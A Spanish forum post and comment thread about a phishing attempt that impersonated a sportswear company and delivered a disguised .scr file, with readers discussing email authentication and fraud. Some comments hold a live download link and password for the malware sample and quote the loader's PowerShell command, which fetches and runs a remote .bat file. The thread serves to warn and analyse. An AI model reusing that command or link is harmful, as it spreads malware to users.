Phising vivido en mis propias carnes

Hace una semana recibí un correo, a mi dirección de trabajo, donde una empresa fabricante de material deportivo de la que soy consumidor desde hace años (desconozco si es casualidad) nos solicitaba la creación de un dosier para colaborar con ellos en el territorio nacional. Obviamente, me hizo ilusión puesto que sus productos son realmente buenos y me gustaría trabajar con dicha empresa.

Tenía la mosca detrás de la oreja y me parecía todo muy raro, pero tras comprobar que, efectivamente, el correo era legítimo y la dirección desde la que se me enviaba existía realmente y salía de los servidores de esta empresa, respondí indicando que estábamos interesados y que podíamos mantener una videollamada en inglés en cualquier momento. Cabalgaba entre la sospecha y la alegría.

Su respuesta, que me descargase el kit que ellos enviaban a los colaboradores para poder mantener dicha reunión con todos los datos posibles. Me facilitó un enlace a Dropbox, protegido con contraseña, para descargarme un archivo comprimido con toda la información necesaria. Como uno es perro viejo, me descargué el archivo y simplemente miré el nombre de los archivos... Todo parecía legítimo, y bien estructurado en carpetas, tal y como se esperaría de una empresa seria.

Pero algo hizo que se me arquease una ceja. Entre medias de tanto archivo había uno con doble extensión, un scr (protector de pantalla de Güindous), por ahí medio escondido, que se suponía que era un Excel con datos financieros. Inmediatamente me puse en contacto con la empresa, les conté lo sucedido, y ayer mismo publicaron una nota en su web alertando de que les habían suplantado.

Cuento esto como anécdota y para alertar de que este tipo de timos. Tengo la suerte de ser una persona desconfiada y con conocimientos informáticos superiores a la media, pero sé que si esto se hubiese mandado a alguno de mis socios les hubiese colado perfectamente (o que me hubiesen pillado con la guardia baja fruto de la ilusión). Nadie está a salvo.

254 meneos

11717 clics

publicado
____

106 comentarios

COMENTARIOS DESTACADOS

: «"protegido con contraseña" Eso es una red flag de libro, el método más usado para proteger archivos maliciosos de escaneos de antivirus de los proveedores de alojamiento en la nube. Una cosa que deberías hacer en este caso es subir el(los) archivo(s) descomprimido(s) (o comprimidos SIN contraseña) a VirusTotal y ver qué es lo que te cuenta el análisis.»

2024-12-06 14:12:14

: «Tengo la suerte de ser una persona desconfiada y con conocimientos informáticos superiores a la media, Como debe ser. Aquí no hay que fiarse de nadie.»

2024-12-06 10:44:51

: «Ya ni DMARC ni DKIM ni po**as . Los atacantes usan cuentas email corporativas con credenciales pwneadas . (y que no llevan 2FA).»

2024-12-06 12:30:57

: «#7 Es que no era ni necesario el análisis. Como cuento, ni siquiera necesité decriptar el archivo comprimido, simplemente ver el nombre y las extensiones de lo que contenía. No puedo asegurar que fuesen directamente a por mí, puede ser casualidad, pero que supiesen que yo hacía uso de sus productos y que conociesen además a qué me dedicaba profesionalmente, me hace pensar.»

2024-12-07 06:59:37

: «#6 a mí estando en paro, en medio de la pandemia y en un montón de procesos online, me intentaron timar con una oferta falsa de trabajo construida a partir de mi propio CV y mezclando cosas de distintos empleos previos. Les pillé porque había un par de frases que copiaron literalmente pero eso con la IA será mucho más difícil de detectar, y porque el número tenía rastro en Google de otras estafas, que eso también lo irán perfeccionando...»

2024-12-07 09:18:37

#7 ochoceros

"protegido con contraseña"

Eso es una red flag de libro, el método más usado para proteger archivos maliciosos de escaneos de antivirus de los proveedores de alojamiento en la nube.

Una cosa que deberías hacer en este caso es subir el(los) archivo(s) descomprimido(s) (o comprimidos SIN contraseña) a VirusTotal y ver qué es lo que te cuenta el análisis.

23 180

#9 wildseven23

Es que no era ni necesario el análisis. Como cuento, ni siquiera necesité decriptar el archivo comprimido, simplemente ver el nombre y las extensiones de lo que contenía.

No puedo asegurar que fuesen directamente a por mí, puede ser casualidad, pero que supiesen que yo hacía uso de sus productos y que conociesen además a qué me dedicaba profesionalmente, me hace pensar.

5 69

#11 ochoceros

Pues coméntalo en tu empresa/entorno porque eso quiere decir que hay alguien con una brecha en su sistema.

Probablemente fue en la empresa a la que avisaste y ellos pongan medidas, pero hay que andar con mil ojos porque hoy en día con la IA pueden hasta suplantar a alguien con voz en una llamada telefónica si tienen el control remoto de su sistema, tipo "hola, soy X y acabo de recibir tu email" y te llaman desde un móvil con el CallerId modificado para que aparezcan como tú… » ver todo el comentario

4 50

#60 lectorcritico

Cual seria la solucion? Usar correo firmado internamente o tambien tendria tambien el acceso a la firma?
Tambien se podria vigilar si el correo de la secretaria manda correos cuando no esta en su puesto de trabajo.

No tengo claro que ha pasado a si se han hecho pasar por una empresa o han infectado una empresa legitima con el sofware que distribuyen.

Con el texto esta clara la necesidad de firmar, porque se pierde casi todo lo que identifica auna persona, caligrafia, ritmo… » ver todo el comentario

0 16

#70 ochoceros

"No se si hay comunicaciones de voz firmadas, pero deberia haberlas."

Te pueden falsificar el CallerID y usar una voz falsificada en tiempo real. Con un hardware potente y acceso a tu imagen, incluso lo podrían hacer con una vídeoconferencia.

Ante la duda hay que recurrir siempre al "te llamo yo a tu número" y DESCONFIAR si te responde "es que se me ha roto, llámame a este"; de eso nada, le llamas a la empresa y que te pasen con él.

0 12

#73 lectorcritico

me refero a firma criptografia, que seria "infalsicable" salvo que roben lacontraseña privada.
es.m.wikipedia.org/wiki/Firma_digital

0 16

#97 wildseven23

Sí, lo he pasado por varios traductores y no se entiende un carajo, ja, ja, ja.

1 31

#104 johel

"Cual seria la solucion? Usar correo firmado internamente o tambien tendria tambien el acceso a la firma?
Tambien se podria vigilar si el correo de la secretaria manda correos cuando no esta en su puesto de trabajo."

Cuando te roban la cuenta, la cuenta es la autentica asi que con firma o sin ella va dar igual.
Mirar cuando se envian los correos y desde donde es una de las primeras revisiones que hacen los informaticos, si no coincide la ip de origen ni el horario bloqueas la cuenta de forma preventiva.

1 25

#20 Rogers77

me lo puedes pasar? Mándame un mensaje plis y hago análisis de quién está detrás.

2 32

#31 wildseven23

Te dejo por aquí el enlace, por si a alguien le puede interar. ¡¡Ojo!! Es malware, si no sabéis qué hacéis (y menos si usáis Windows) no lo descarguéis.

www.transfernow.net/dl/20241208nSuRF57r

La contraseña es: meneame

3 43

#32 wildseven23

Pues no me había dado cuenta, pero el archivo descomprimido ocupa casi 1 giga, y VirusTotal solamente permite archivos de hasta 650Mb

No obstante, por si alguien tiene curiosidad, he dejado el enlace al bicho en .

2 38

#33 wildseven23

Me cuelgo de mí mismo. También había un lnk para ejecutar esto:

%windir%system32cmd.XXX /c powershell -Command "$h='https://gitlab.com/jjkjsad/khedc/-/raw/main/kjhsgdfww.bat'; $p=$env:TEMP+'Updates.bat'; iwr $h -OutFile $p;start $p"

He renombrado "cmd.exe" a "cmd.XXX" para que a nadie le dé por usarlo. En el archivo estaba bien escrito, claro. He visto el .bat al que apunta, pero está hecho en chino y no soy capaz de descubrir qué hace.

4 54

#67 ochoceros

El fichero .scr está comprimido y está malformado a posta para que declare más espacio del real que usa y así evitar los escaneos. Aún así el contenido aparece sospechosamente limpio.

Dentro de ese fichero tienes el fichero ".rdata" que aparentemente contiene un instalador y librerías de Python, y que casualmente coinciden con el fichero gitlab.com/jjkjsad/khedc/-/blob/main/fuknew512.zip

El código que comentas es trucho y sospechosamente parecido a este:… » ver todo el comentario

1 16

#98 wildseven23

Sí, que el archivo pesase tanto también daba una pista de que algo raro fallaba, ja, ja, ja.

0 15

#35 Rogers77

gracias, lo cojo y lo investigamos;)

3 40

#36 wildseven23

Guay, ya nos contarás

. Más que nada, por curiosidad.

2 35

#24 el_vago

pareces ser un objetivo, por tu puesto y esas cosas. Recibirás phishing personalizado.

1 25

#26 Asnaeb *

Escanealo solo por curiosidad, xfa.

1 26

#1 HeilHynkel

Tengo la suerte de ser una persona desconfiada y con conocimientos informáticos superiores a la media,

Como debe ser. Aquí no hay que fiarse de nadie.

21 143

#2 wildseven23

Tal cual. Pero con el auge de la IA, no me extrañaría que hayan buscando un perfil parecido al mío, que usa sus productos habitualmente (por ahí corren fotos mías con los mismos), para urdir el engaño.

2 29

#3 StarlightHunter.com

Hay que ir acostumbrándose. Cada vez los engaños serán más sofisticados, y con la IA generativa se van a poner más peludas aún las cosas.

7 58

#12 eldios13

la parte de "escrito como el culo" dejaría de ser la forma más fácil de pillar las estafas ..

5 44

#8 HeilHynkel

Pues seguramente, antes iban un poco aleatorios, pero con un buen análisis de IA pueden acertar en los timos mucho más.

0 12

#4 AMDK6III

Ya ni DMARC ni DKIM ni po**as .
Los atacantes usan cuentas email corporativas con credenciales pwneadas . (y que no llevan 2FA).

13 87

#5 johel *

Cuando no estan usando directamente las cuentas corporativas de la empresa de rango X, a las que han conseguido acceso, para intentar escalar hacia objetivos mas interesantes.
Es muy tipico que se hagan con la cuenta de secretaria de una empresa mediana que no es el objetivo para saltar a la cuenta de un empleado digamos de contabilidad y de ese empleado saltar hacia datos de grandes clientes. Durante todo ese proceso intermedio ni siquiera estan usando ningun tipo de hacking, estan dentro con datos autenticos robados.

4 48

#14 shinjikari *

Este año me ha tocado lidiar con dos casos de suplantación en los que SPF y DKIM estaban OK. En el primero cayeron y 5.000€ menos en la empresa

Credenciales robadas desde un equipo al que se accedía al correo y no estaba en el entorno controlado (dominio).

Cada día pinta peor.

¿De que peli es?

5 60

#15 hijolagranputa

De la princesa prometida. Se lo dice el príncipe Humperdinck al tipo que tenia 6 dedos en una mano.

2 32

#16 shinjikari

¡No me acordaba de esa escena! Gracias

0 9

#18 victorjba

Yo solo me acuerdo de lo típico, "Soy Íñigo Montoya y me vas a comer la p..." o algo así

4 48

#23 carlesm

Como no te contesta: The Princess Bride.

“You think this is a trap then?" the Count asked.
"I always think everything is a trap until proven otherwise," the Prince answered. "Which is why I'm still alive.”

1 19

#22 sillycon *

Lo del dominio es muy sospechoso. Estás realmente seguro de que la URL era correcta? Hay ataques llamados homográficos donde se usan caracteres especiales con la misma forma que caracteres habituales para contratar dominios y suplantar al original.

5 60

#25 santim123

Esa me la apunto. Recibo unos 3-4 intentos de timo al mes.

0 10

#29 MADMax2

¿sólo?

1 20

#34 wildseven23

Pues, mira, también lo pensé, pero se parecía horrores a uno que esta empresa usaba y un socio me dijo que era correcto... Y acabo de darme cuenta que no. Era "correcto" porque tienen una redirección desde ese dominio a uno oficial.

Acabo de comprobar que el dominio se compró a finales del mes pasado, lo que, obviamente, descarta que sea un dominio oficial.

3 53

#101 wildseven23

No no, lo respondí en (creo). Esta peña se ha comprado un dominio casi idéntico al que usan habitualmente, han hecho que dicho dominio redirija al dominio principal de la empresa y ya está. No han accedido a su servicio de correo ni nada.

0 15

#13 hijolagranputa

"Siempre pienso que todo es una trampa; por eso sigo con vida".

Tengo el fotograma de la peli con la frase debajo y se la envío de vuelta cuando alguna empresa manda un correo a la mía avisando de que no abran sus mensajes porque han sido víctimas y tal y tal.

El sentido común te ayuda con estas mierdas, pero desgraciadamente también es el menos común de los sentidos.

5 57

#21 Zarangollo

En el correo del departamento de rrhh de mi empresa cada semana aparece un email solicitando el cambio de cuenta bancaria para las nóminas de algún empleado al azar de la empresa, con nombre y apellidos.

4 45

#28 MADMax2

Esa información la suelen sacar de linkedin.

Nos llegan muchos correos del estilo. La firma de esos correos son frases literales que tienen los suplantados en su linkedin

2 38

#38 Zarangollo *

si, se nota, además usan el mismo "puesto". Pero sin problema, el protocolo para esas cosas no es por email y consta de varias verificaciones adicionales.

1 22

#6 celyo *

Yo ya tras una experiencia, que me salvo por ser algo desconfiado, ya desconfio de todo y prefiero llamar en caso antes de hacer nada.

A mi me pilló con la guardia baja de estar currando pensando en otras historias, llamarme y tratar de ser amable, hasta que me pedía datos para contratar algo y ya le dije que no.

Lo malo fue que me dijeron mi nombr con apellidos, mi dirección real. Me sonsacaron el dni, eso fue malo.
Pero la cosa se quedó ahí.
Fui asustado a la poli, pero sin nada más, no hicieron nada.

Asi que ahora a ser seco y cortante, y si algo me interesa ya preguntaré en la tienda o emprrsa de turno via oficial.

Como ya lei por aquí una vez, asumo siempre que tienen mis datos, asi que confianza 0

4 41

#10 ElSev

a mí estando en paro, en medio de la pandemia y en un montón de procesos online, me intentaron timar con una oferta falsa de trabajo construida a partir de mi propio CV y mezclando cosas de distintos empleos previos.

Les pillé porque había un par de frases que copiaron literalmente pero eso con la IA será mucho más difícil de detectar, y porque el número tenía rastro en Google de otras estafas, que eso también lo irán perfeccionando...

6 67

#27 tableton *

Teniendo en cuenta q se está llegando a suplantar incluso en llamadas de voz y videollamadas, llo que no falla es ponerte en contacto con la empresa o persona usando un teléfono o email publicados en la web de la empresa o q tú sepas q es 100% verificado. Siempre q está web no sea falsa también

2 37

#17 chavi

Eso se acaba eliminando la posibilidad de enviar correos sin firma digital.

O se firma con una clave privada válida (con su pública correspondiente certificada), o no se envía el email.

En España es coste-0. Ya hemos gastado la pasta en el DNIe que nadie usa.

3 29

#43 edgard72

y en GSuite, ¿cómo lo haces sin lector de correo externo? Más y más (grandes) empresas lo usan.

0 9

#44 chavi *

Google debe poner los medios o cerrar el servicio. Es una simple cuestión legal.

Y si tienes que usar una aplicación de correo, la usas.

Pero se debería prohibir por LEY el envio de e-mails sin firma digital válida.

Adiós Spam y adiós phising y timos por ingeniería social.

0 11

#46 mcfgdbbn3

: Prohibido prohibir. Tú no eres nadie para decidir si dos particulares se envían entre ellos correos con firma digital o sin ella si tú no eres ninguno de esos dos particulares.

0 12

#48 chavi

"Prohibido prohibir. "
Los cojones. Eso da lugar a una sociedad invivible.

Tú no eres nadie para decidir si dos particulares se envían entre ellos correos con firma digital o sin ella
No. Pero el Parlamento si
Ente sus obligaciones está el asegurar las comunicaciones y hacer que no sea posible que alguien se haga pasar por tu amigo sin que tú no lo sepas si existe la posibilidad.
Y existe

0 11

#49 mcfgdbbn3 *

: Te vuelvo a decir: ¿Qué te importa a ti que dos personas particulares se envíen un correo electrónico anónimo y sin firmar? ¿Te perjudica en tus actividades diarias?

Lo que sí apoyo es que exista una opción de rechazar correos entrantes no firmados. y el que quiera que la active, y el que no que siga como hasta ahora.

Basta de mordazas, si te molesta Internet solo tienes que desconectar el cable de red.

0 12

#53 chavi *

Si a mi me importa que exista la posibilidad de que alguien se haga pasar por otra persona al enviar un correo pudiéndose evitar

Dos personas particulares enviándose email sin firmar jamás sabrán con seguridad si el correo fué enviado por la persona que creen.

A tí te parecerá eso deseable, tú sabrás por qué. A mí me parece tan indeseable que se debería impedir. Y se puede hacer.

La firma electrónica no es ninguna "mordaza".

Aplicamos lo mismo al https y permitimos certificados falsos?

0 11

#55 mcfgdbbn3

: Dos personas particulares enviándose email sin firmar jamás sabrán con seguridad si el correo fué enviado por la persona que creen.

Ya te he dicho una solución muy sencilla: al que no le guste que desactive los correos no firmados.

Pero si tú no eres ninguna de esas dos personas, no tienes que imponerlas tu criterio sobre lo que tienen que hacer en su vida personal, que no es tu vida.

No te metas en las vidas ajenas, no digas a los demás lo que tienen que hacer.

La firma

… » ver todo el comentario

1 15

#56 chavi *

Eliminamos entonces los mecanismos que hay con https ???

Estás en contra de ellos ? Permitimos que un banco o tienda pueda trabajar sin https ??

Si no se obliga a la firma, el correo electrónico es un problema. Y el envío de correos anónimos no es algo que se deba permitir

1 18

#58 mcfgdbbn3

: Estás en contra de ellos ? Permitimos que un banco o tienda pueda trabajar sin https ??

¿A caso el correo electrónico solo se usa para trabajar o para ofrecer servicios?

Si no se obliga a la firma, el correo electrónico es un problema. Y el envío de correos anónimos no es algo que se deba permitir

¿También vas a prohibir la venta de bolígrafos y reglas con letras?

0 12

#63 chavi

¿También vas a prohibir la venta de bolígrafos y reglas con letras?
Y por qué habría de hacerlo?

0 11

#64 mcfgdbbn3 *

: Por si acaso alguien te mete una carta anónima en el buzón, mejor con impresoras que ponen puntitos amarillos, los bolis BIC no los hacen.

0 12

#66 chavi

Si alguien me pone una carta anónima en el buzón no trae un remite falso. Y hay una letra reconocible.

Si permitimos remites falsos en el e-mail no hay modo fiable de comprobar si el remite corresponde con el autor salvo la firma electrónica.

Cuando te pase algo grave ya cambiarás de opinión

0 11

#68 mcfgdbbn3 *

: Y hay una letra reconocible.

Salvo que hayas usado una regla de letras.

Si permitimos remites falsos en el e-mail no hay modo fiable de comprobar si el remite corresponde con el autor salvo la firma electrónica.

La firma electrónica la puede poner el proveedor del servicio, por ejemplo, si usas Gmail, Google puede poner la suya, asegurando de que ese correo electrónico proviene de Gmail y de esa cuenta.

Cuando te pase algo grave ya cambiarás de opinión… » ver todo el comentario

0 12

#76 chavi

La firma electrónica la puede poner el proveedor del servicio, por ejemplo, si usas Gmai
Eso es una locura. De verdad admitirias que cualquiera de los cientos de personas que tengan acceso a las claves se puedan hacer pasar por tí sin tú consentimiento???

Estamos locos..

Nunca me opondré al anonimato en Internet
Es que esto no tiene nada que ver con el anonimato en internet. Tiene que ver con la suplantación de identidad y la proteccion tanto del emisor como del… » ver todo el comentario

0 11

#78 mcfgdbbn3 *

: Eso es una locura. De verdad admitirias que cualquiera de los cientos de personas que tengan acceso a las claves se puedan hacer pasar por tí sin tú consentimiento???

Es que ahí es donde está el problema, en que los únicos correos de Gmail que lleguen con mi dirección sean los que yo he enviado.

Y te diré algo más: nunca he sabido cómo usar lo del PGP, siempre me ha parecido un jaleo y he tenido que usar tutoriales cada vez que quería hacer algo. A lo mejor para el que lo inventó… » ver todo el comentario

0 12

#79 chavi

0 11

#82 mcfgdbbn3

: Ya meto mi contraseña en el servicio, si tú quieres más seguridad, te la quedas para ti, a mí no me toques las pelotas, que no todos queremos vivir como tú.

Bloquea los correos sin firmar y déjanos a los demás vivir en paz.

0 12

#84 chavi

Ya meto mi contraseña en el servicio, si tú quieres más seguridad, te la quedas para ti,
Veo que no comprendes la magnitud del problema.
Cuando alguien te suplante y cree un problema grave lo entenderás. O cuando el problema se deba a que te tragues un correo con origen falsificado

0 11

#85 mcfgdbbn3

: A lo mejor eres tú el que no entiendes que no vives solo en el planeta, ni tampoco eres el único usuario de Internet.

0 12

#89 chavi *

Precisamente porque soy consciente de eso propongo esta medida.

Pero tú sabes en qué consiste una firma digital, por dios...

0 11

#90 mcfgdbbn3

: Pues proponla para ti solo.

Otra opción es que crees una segunda Internet con esa medida, si tan buena es seguro que tienes éxito.

0 12

#83 chavi

"Es que ahí es donde está el problema, en que los únicos correos de Gmail que lleguen con mi dirección sean los que yo he enviado."

El único modo de garantizar eso es la firma electrónica. Ni siquiera necesitan salir de servidores de GMail a pesar de mecanismos opcionales como DMARC y DKIM.

Y si las claves privadas que te identifican no son tuyas, estás vendido. Jamás aceptaría algo así, ni debería hacerlo nadie con dos dedos de frente.

Lo de no conseguir usarlo es simplemente… » ver todo el comentario

0 11

#88 mcfgdbbn3

: DMARC y DKIM

Hay gente que casi no sabe usar un correo electrónico y te pones a hablar de algo que yo tampoco sé lo que es.

Y si las claves privadas que te identifican no son tuyas, estás vendido. Jamás aceptaría algo así, ni debería hacerlo nadie con dos dedos de frente.

Yo lo que propongo es que los únicos correos que lleguen con mi dirección de correo de remitente, sean los enviados desde mi cuenta, si alguien accede a ella, pues mala suerte.

Nada. Están protegidas

… » ver todo el comentario

0 12

#93 chavi

Hay gente que casi no sabe usar un correo electrónico y te pones a hablar de algo que yo tampoco sé lo que es.
Ves?
Por eso la firma digital de los email es algo completamente imprescindible.
Sabes en qué consiste?

No entiendo ese rechazo

O sea, a meter un PIN... ¿Y si te lo copian?
Sin la clave privada es inútil.

la única diferencia a si usas firma digital es que si el correo viene firmado digitalmente no crees que el correo viene de la diceccïón que indica: lo sabes con seguridad.
No hay más diferencias.

Repito. Sabes que es una firma digital?

0 11

#95 mcfgdbbn3

: Sí, una firma digital es lo que te piden para hacer trámites en línea y que la última vez a punto estuvo de jugarme una mala pasada.

0 12

#96 chavi

Sabes en qué consiste?

A qué te refieres con "una mala pasada"?

Es cierto que a diferencia de los clientes de mail la gestión de las firmas digitales en los navegadores es deficiente. Tendrían que mejorarla

0 11

#99 mcfgdbbn3

: Pues que casi no presento unos papeles porque no me decía que el fallo era por ese tema, yo creía que funcionaba con Cl@ave PIN.

0 12

#77 chavi

Por otra parte, que te pongan anonimos en el buzón es difícilmente evitable. Pero muy muy indeseable.

Menos para tí, que estarías encantado

0 11

#57 chavi *

La mordaza es no poder comunicarse desde el anonimato
Estás sugiriendo que te dejen enviar anónimos a cualquier persona de modo impune ?
Con qué objetivo ?

Hablamos de correo electrónico, no de un foro. Es un intercambio entre dos personas.

Por ejemplo, poder decir que estoy a favor de que la donación de órganos pueda condicionarse en función del receptor y negar que los antidisturbios puedan recibir mis órganos o mi sangre, y que nadie me pueda perseguir por estas palabras en mi vida real.
Nada de eso tienes que ver con el correo electrónico ni con facilitar la posiibilidad de que puedas enviar mensajes a alguien haciéndote pasar por otra persona. Que es justo lo que quieres.

0 11

#59 mcfgdbbn3

: Estás sugiriendo que te dejen enviar anónimos a cualquier persona de modo impune ?
Con qué objetivo ?

¿Tal vez poder consultar cosas sin que dichas consultas luego sean asociadas a mi persona?

Hablamos de correo electrónico, no de un foro. Es un intercambio entre dos personas.

El correo electrónico no es lo a ti te de la gana. Te digo, si no quieres leer correos sin firmar, no los leas, pero lo que hagan los demás en su vida privada no debería importarte. Métete en tus… » ver todo el comentario

1 15

#61 chavi *

¿Tal vez poder consultar cosas sin que dichas consultas luego sean asociadas a mi persona?
Eso no tiene ninguna relación con el correo electrónico.

El correo electrónico no es lo a ti te de la gana
Obviamente. Ni lo que te de la gana a tí.
El correo electrónico tiene una única utilidad que es el envío de un mensaje desde una dirección de correo origen a una o varias direcciones de correo destino.

Nada más.

si no quieres leer correos sin firmar,
Exactamente. No quiero que me puedan mandar mensajes desde direcciones de correo falsas. No quiero que tengan la posibilidad de hacerlo

Tú por lo visto sí quieres. Tú sabrás por qué

0 11

#62 mcfgdbbn3

: Exactamente. No quiero que me puedan mandar mensajes desde direcciones de correo falsas. No quiero que tengan la posibilidad de hacerlo

Si tu proveedor impide la entrada de dichos correos, tampoco tendrán la posibilidad de hacerlo, con la diferencia de que no vas a perjudicar a otras personas que ni son como tú, ni quieren serlo.

También podemos prohibir las bicis porque no tienen ni seguro ni matrícula.

0 12

#65 chavi

Si tu proveedor impide la entrada de dichos correos, tampoco tendrán la posibilidad de hacerlo
Exacto. Eso eso es justo lo que pido. Que los servidores de correo no envíen correos sin firma electrónica.

Eso no perjudica absolutamente a nadie con actividades legítimas. No se debe permitir el envío de correos haciéndose pasar por terceras personas.

0 11

#71 mcfgdbbn3 *

Eso no perjudica absolutamente a nadie con actividades legítimas.

Eso es lo que tú te crees, yo en Menéame estoy dando opiniones que no daría en público porque soy bastante anónimo.

Yo mismo he hablado de que tengo pensamientos intrusivos, eso rara vez lo suelo contar a personas reales, especialmente si son muy próximas, por ejemplo, a mis familiares JAMÁS les contaría eso. ¿Te parece bien exponer públicamente a las personas que cuentan estas cosas y que gracias al anonimato lo pueden contar sin problema? Y eso solo en cuanto a vergüenza social, porque te pueden excluir de procesos de selección laboral si se enteran de que te pasa eso.

0 12

#75 chavi *

yo en Menéame estoy dando opiniones
Ni el e-mail es menéame ni se usa para dar opiniones. Es un instrumento de intercambio de mensajes personales. Si dejamos que el remitente pueda falsificar su identidad lo que tenemos es lo que hay: basura

o rara vez lo suelo contar a personas reales, especialmente si son muy próximas, por ejemplo, a mis familiares JAMÁS les contaría eso. ¿Te parece bien exponer públicamente...
Los email no son públicos. Son intercambios de mensajes… » ver todo el comentario

0 11

#80 mcfgdbbn3

: El correo electrónico tiene muchos más usos que los que tú haces.

Para empezar, para registrarte en muchas páginas necesitas un correo electrónico.

Los email no son públicos. Son intercambios de mensajes privados. Y para mayor privacidad tienes el cifrado
Son procesos cómodos y transparentes. Una vez configurado no es un proceso distinto al envío de un email "normal".

Existen las listas de correo, ahora se usan poco, pero ahí están.
Y eso de que no son públicos...… » ver todo el comentario

0 12

#87 chavi

Para empezar, para registrarte en muchas páginas necesitas un correo electrónico.
Eso solo es para recibir un segundo factor de autenticación. Supongo que te alegraría poder garantizar 100% que cuando recibes la petición en el email de un site sepas con seguridad que viene realmente de ese site.

Además uedes generar una dirección de email con esas cosas con su clave privada correspondiente.

Y no, no hay que reconfigurar nada pasadas tres semanas.

0 11

#91 mcfgdbbn3

: Eso solo es para recibir un segundo factor de autenticación. Supongo que te alegraría poder garantizar 100% que cuando recibes la petición en el email de un site sepas con seguridad que viene realmente de ese site.

Te vas al sitio y haces lo que tengas que hacer sin hacer clic en enlaces del correo.

0 12

#94 chavi

Eso no siempre es posible

0 11

#45 mcfgdbbn3

: ¿Y el anonimato dónde lo dejas?

Si quieres, no recibas correos que no tengan eso, pero no digas nada de los envíos.

0 12

#50 chavi *

En un envío de un email ?????

En ningún lado. Nadie debe poder enviar emails de modo anónimo (o sea con dirección de origen falsa). No tiene sentido.

0 11

#51 mcfgdbbn3

: No tendrá sentido para ti, para otras personas sí lo puede tener.

Sí estoy de acuerdo en que el origen del mensaje tiene que ser el que es, eso de que se pueda manipular es lo que hay que eliminar, pero andar metiendo mi DNI, nombre y apellidos para enviar correos... NO.

0 12

#52 chavi *

Claro. Para los que envían spam o hacen phising.

Para que otra cosa sirve enviarle un email a alguien con un correo de origen falso ???

0 11

#54 mcfgdbbn3 *

: El origen (la dirección de correo) estoy de acuerdo en que sea el que es.

Lo que no estoy de acuerdo es en que haya firmas digitales para cada persona, y que para enviar un correo tengas que andar con certificados digitales, PIN permanente, PIN cl@ve y todo eso, y encima poniendo tu nombre y apellidos reales.

Lo ideal para un servicio de información sexual para adolescentes, por ejemplo, que tengan que poner ahí su nombre real.

0 12

#69 chavi

La firma digital es transparente una vez configurada. Pulsas enviar y listo. Y lo único que hace es garantizar que tú eres el autor del mensaje y no otra persona.

No entiendo que nadie esté en contra de eso

0 11

#72 mcfgdbbn3

: ¿Te parecería bien que los mensajes de Menéame tuvieran todos un código asociado a mi DNI?

¿Tu crees que hablaría de los pensamientos intrusivos si tuviera que hacer eso? Y en general, el anonimato de la red permite a la gente hablar de problemas que jamás hablarían si tuvieran que hacerlo dando la cara. A lo mejor tu vida es perfecta, pero la vida de otras personas no lo es. Y lo mismo pasa con otros temas. ¿Si una persona tiene fetichismo por el furry te parece bien exponerla? O si alguien tiene SIDA y quiere preguntar algo. ¿Te parece bien exponer su DNI al público?

Vives en el mundo de la Piruleta.

1 28

#74 chavi *

¿Te parecería bien que los mensajes de Menéame tuvieran todos un código asociado a mi DNI?
No.
Meneame no es el e-mail.
Lo que me parece mal es que puedas mandarme un mensaje con la dirección de mi hermano como remite sin que tenga la posibilidad (para alguien sin conocimientos informáticos) de saber si fue mi hermano o no. Y quien dice mi hermano dice mi banco, mi empresa o un colega.

Aquí no hablamos del "anonimato de la red". Hablamos concretamente del envío de emails.

Y no. No se debe permitir el envío de emails sin firma digital. No hay ninguna razón para hacerlo salvo facilitar el spam y el fraude.

0 11

#81 mcfgdbbn3

: Hay gente que está defendiendo que no exista el anonimato en Internet, o sea, que eso que propones par el correo también se aplique a Menéame. Y por mí tus estándares de seguridad impuestos te los puedes meter por donde tengas sitio.

0 12

#86 chavi

No es el caso

Estoy hablando única y exclusivamente de la firma digital de los correos electrónicos. Punto

Bajo mi punto de vista es algo urgente e imprescindible.

0 11

#41 wildseven23

No, no, quien tenía acceso a todo era el director de RR.HH., creo que me he expresado mal

1 27

#42 chavi

Ah!!

Pues si que es segura vuestra infraestructura, si...

1 23

#37 lorne_malvo

Un familiar estuvo muy cerca de liarla, con una variante del ataque al CEO. Suplantaron a una empresa cliente y se hicieron con los datos personales de toda su empresa. De hecho le llegó la llamada redireccionada desde la propia empresa. En líneas generales buscaban la firma del director financiero para realizar una transferencia. El timador conocía el nombre de sus hijos, colegio y sabía que estaba de vacaciones. Le salvo, una vez aportada la firma escaneada (que esto daría para bastante discusión), la insistencia para que hablara con el banco, presionando incluso con su posible despido. Y bueno en el corto plazo, tuvo que dejar la empresa por vergüenza, porque el tema cortó de raíz cualquier posible progresión.

2 23

#39 wildseven23

Al director de RR.HH. de mi antigua empresa le contactaron por mail con mogollón de información "fiable" (sacada de Linkedin, supongo), y terminó abriendo un "excel"... El resultado, más de un giga de información sobre la empresa, trabajadores, nóminas y demás mierdas.

Menos mal que el responsable del CPD se dio cuenta a tiempo, porque tenía acceso hasta a los repositorios de software (a saber por qué).

Todos estos datos, puesto que mi ex empresa se negó a pagar, terminaron publicados en la red TOR. Unos días de muchas risas y cachondeo, que concluyeron con el despido de esta persona.

1 27

#40 chavi

Si los datos no se guardan cifrados el responsable del CPD tiene acceso a absolutamente todo.

Ahora imagínate que el CPD es externo...

1 23

#30 calde

yo los que conozco son tan burdos que sólo con leer el email, o incluso viendo el remitente, ya es suficiente para tener claro que es un timo. Lo único jodido es que los recibo periódicamente y no sé cómo hacer que el mail reconozca que son una estafa, porque cambian el nombre y dirección del remitente en cada envío.

1 18

#19 Perico12

Gracias por el aviso.

0 9

#47 javiercampos

"el correo era legítimo y la dirección desde la que se me enviaba existía realmente y salía de los servidores de esta empresa". Por curiosidad, ¿cómo compruebas que un correo viene de los servidores de una empresa?

0 9

#92 chavi

No existe un modo fiable y simple. Un mail es simple texto en claro.

0 11

#100 javiercampos

Por eso le preguntaba a cuál era su método.

0 9

#102 unomasdelmonton *

tienes que mirar las cabeceras del email para ver el servidor que ha enviado el correo. Estás cabeceras siempre están ocultas y tienes que buscar en tu cliente de correo como verlas

En inglés mail headers

Luego tienes que consultar el registro SPF del dominio de la empresa que en teoría ha enviado el email y ver si en esa lista de servidores autorizados aparece el servidor que has visto en las cabeceras del email.

Esto no garantiza que sea 100% seguro de la empresa porque puede haber autorizado a Amazon o MailChimp u otros servidores de correo por alguna razón y que son compartidos por muchos clientes.

Lo que sí garantiza es que si no está o es un correo falso o la empresa lo hace mal en temas de seguridad y no debes fiarte.

1 18

#103 musg0

Si concuerda dkim/spf ese correo ha salido de un servidor legítimo. Ya si les han robado las credenciales, o les han modificado el DNS no se puede saber desde el destinatario sin consultar con algún administrador de sistemas de la empresa del envío.
